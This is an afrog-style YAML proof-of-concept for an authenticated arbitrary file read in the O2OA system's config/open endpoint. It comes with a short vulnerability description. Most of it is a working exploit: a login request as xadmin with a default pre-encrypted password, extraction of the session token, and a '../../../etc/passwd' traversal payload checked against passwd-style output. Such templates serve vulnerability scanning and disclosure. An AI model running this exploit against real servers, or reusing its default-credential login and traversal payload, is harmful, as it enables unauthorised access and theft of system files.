Vulnerability description
The `open` interface of the O2OA system has an arbitrary file read vulnerability: once authenticated, an attacker can pass a traversal path in the `fileName` parameter of `/x_program_center/jaxrs/config/open` and read arbitrary files from the server. The PoC below first logs in as `xadmin` with the default (pre-encrypted) password, extracts the session token from the response, and then requests `../../../etc/passwd` with that token. The templates below are afrog-style PoC YAML.
Fingerprint: title=="O2OA"
id: o2oa-open-read-file

info:
  name: O2OA open backend arbitrary file read vulnerability
  author: zan8in
  severity: high
  verified: true
  description: |
    The open interface of the O2OA system has an arbitrary file read vulnerability. An attacker can exploit it to read arbitrary files.
    title=="O2OA"

rules:
  # r0: log in as xadmin with the default password (sent pre-encrypted, isEncrypted=y)
  # and capture the token from the JSON response.
  r0:
    request:
      method: POST
      path: /x_organization_assemble_authentication/jaxrs/authentication/captcha?v=7.3&lg6aq1g1
      headers:
        Content-Type: application/json; charset=UTF-8
        Cookie: x-token=anonymous
        Authorization: anonymous
      body: |
        {"credential":"xadmin","password":"Kn2Q3eM/KMmNrM287ju4ELXjA63+86QJOQ4mE6ASnn6mdUmp6K4gfarzQxGzl1VwFbskPkk5p34uCEbm4WDa9LYjB7e/GtFpSakHkb3HVc7EmZF9Reap/ci2Ern00lMJIl4/1RFYGNO1MYNJtEAfcG8NVpgG7FaFAm8Dbw+Tb9U=","isEncrypted":"y"}
    expression: response.status == 200 && response.body.bcontains(b'"employee":') && response.body.bcontains(b'"success"') && response.body.bcontains(b'"xadmin"')
    output:
      search: '"\"token\": \"(?P<token>.+)\",".bsubmatch(response.body)'
      token: search["token"]
  # r1: reuse the token as the Authorization header and ask the open endpoint for
  # a traversal path; a passwd-style "root:x:0:0:" line in the body confirms the read.
  r1:
    request:
      method: POST
      path: /x_program_center/jaxrs/config/open?v=6.3
      headers:
        Content-Type: application/json; charset=UTF-8
        Authorization: "{{token}}"
      body: |
        {"fileName":"../../../etc/passwd"}
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() && r1()